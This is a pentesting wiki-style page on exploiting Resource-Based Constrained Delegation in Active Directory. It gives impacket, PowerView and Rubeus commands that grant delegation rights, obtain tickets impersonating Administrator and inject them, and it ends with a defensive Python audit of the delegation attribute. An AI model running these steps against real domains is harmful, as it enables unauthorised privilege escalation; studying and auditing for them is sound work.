# Resource-Based Constrained Delegation

Resource-Based Constrained Delegation (RBCD) is a Kerberos delegation feature configured on the resource itself: a computer account lists the other accounts that it trusts to impersonate users to it (e.g., ComputerA allows ComputerB to impersonate any user and authenticate to ComputerA as that user).

> Attribute: msDS-AllowedToActOnBehalfOfOtherIdentity

To exploit Resource-Based Constrained Delegation, you need a few prerequisites:

* Control over a user or computer account with a SPN (ComputerA or UserA)
* Permissions to modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute for ComputerB (the target computer you want access to)

## Exploit

### Scenario

You control ComputerA and a domain user account, `ducky`, who has WriteProperty permissions for ComputerB.

The goal is to make ComputerB trust ComputerA for delegation, so that a service ticket (ST) for ducky -> ComputerA can be used in S4U2Proxy to obtain an ST for ducky -> ComputerB.

{% tabs %}
{% tab title="impacket-rbcd" %}
{% embed url="https://github.com/fortra/impacket" %}

{% code title="Linux (Attacker)" %}

```fish
## Add the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to ComputerB
## to allow delegation from ComputerA
rbcd.py -delegate-from 'ComputerA$' -delegate-to 'ComputerB$' -dc-ip '[DC IP]' -action 'write' '[domain]/ducky:Password'

## Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to confirm it
rbcd.py -delegate-to 'ComputerB$' -dc-ip '[DC IP]' -action 'read' '[domain]/ducky:Password'

## Obtain an ST using credentials for ComputerA$ impersonating the built-in Administrator
## (the SPN names the service host, not the ComputerB$ account name)
getST.py -spn 'cifs/ComputerB.[domain]' -impersonate Administrator -dc-ip '[DC IP]' '[domain]/ComputerA$:Password'
```

{% endcode %}
{% endtab %}

{% tab title="PowerView/Rubeus" %}
{% embed url="https://github.com/GhostPack/Rubeus" %}

{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" %}

{% embed url="https://github.com/S3cur3Th1sSh1t/SharpImpersonation" %}

{% code title="Windows" %}

```powershell
## Get the SID of ComputerA (PowerView returns objectSid as a SID string)
$sid = Get-DomainComputer -Identity ComputerA -Properties objectSid | Select-Object -ExpandProperty objectSid

## Build the raw binary security descriptor for msDS-AllowedToActOnBehalfOfOtherIdentity
## using ComputerA's SID as the trustee of a single full-control ACE
$rsd = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$sid)"
$rsdb = New-Object byte[] ($rsd.BinaryLength)
$rsd.GetBinaryForm($rsdb, 0)

## Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute onto ComputerB
Get-DomainComputer -Identity "ComputerB" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb}

## Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to confirm it
Get-DomainComputer -Identity "ComputerB" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

## Request a TGT for ComputerA$
Rubeus.exe asktgt /user:ComputerA$ /rc4:[NTLM password hash for ComputerA] /nowrap

## S4U2Self and S4U2Proxy to get an ST as Administrator for ComputerB
Rubeus.exe s4u /user:ComputerA$ /impersonateuser:Administrator /msdsspn:cifs/ComputerB.[domain] /ticket:[ComputerA TGT] /nowrap

## Inject the newly obtained ST as Administrator for ComputerB into a new process
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:Administrator /password:AnyPassword /ticket:[ComputerB ST]

## Impersonate the token of the process created above (SharpImpersonation)
Invoke-SharpImpersonation -Command "pid:[pid]"
```

{% endcode %}
{% endtab %}
{% endtabs %}
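Both tabs above write the same thing: a self-relative security descriptor whose DACL names the accounts trusted to act on behalf of ComputerB. As an added example (not impacket, Rubeus or PowerView code), the following Python decodes such a value so a defender reviewing `msDS-AllowedToActOnBehalfOfOtherIdentity` across computer objects can list the trusted SIDs and flag any that are not on an approved list; the SIDs and the `build_sd` helper are constructed for the demonstration and mirror the SDDL used on this page.

```python
import struct

# Added audit example (not impacket or PowerView code): decode the self-relative
# security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity and list its trustees.
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004

def sid_bytes(sid):
    """Encode 'S-1-5-...' as a binary SID: revision, count, 48-bit authority, sub-authorities."""
    rev, auth, *subs = (int(p) for p in sid.split("-")[1:])
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def parse_sid(buf, off):
    """Decode the binary SID at buf[off] back into its string form."""
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs)

def allowed_to_act_sids(blob):
    """SIDs holding an ACCESS_ALLOWED ACE in the DACL; [] when the attribute is empty or has no DACL."""
    if len(blob) < 20:  # SECURITY_DESCRIPTOR_RELATIVE header is 20 bytes
        return []
    rev, _, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", blob, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", blob, dacl_off)  # ACL header
    sids, off = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", blob, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(parse_sid(blob, off + 8))  # ACE header (4) + access mask (4)
        off += ace_size
    return sids

def unexpected_delegators(blob, approved):
    """Trustees present in the attribute that are not on the approved allow-list."""
    return [s for s in allowed_to_act_sids(blob) if s not in approved]

def build_sd(allowed_sids):
    """Constructed sample value: owner BA, one full-control (0x000F01FF) allow ACE per SID."""
    owner = sid_bytes("S-1-5-32-544")
    aces = b"".join(struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(s), 0x000F01FF) + s
                    for s in map(sid_bytes, allowed_sids))
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    header = struct.pack("<BBHIIII", 1, 0, 0x8000 | SE_DACL_PRESENT, 20, 0, 0, 20 + len(owner))
    return header + owner + acl

# Constructed SID for a lab ComputerA$; any other trustee in the attribute should be questioned.
COMPUTER_A_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
```

In practice the blob comes from the attribute as returned by LDAP (for example the `read` action in the impacket tab), and `unexpected_delegators(blob, {COMPUTER_A_SID})` returns every trustee that is not expected to delegate to that computer.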
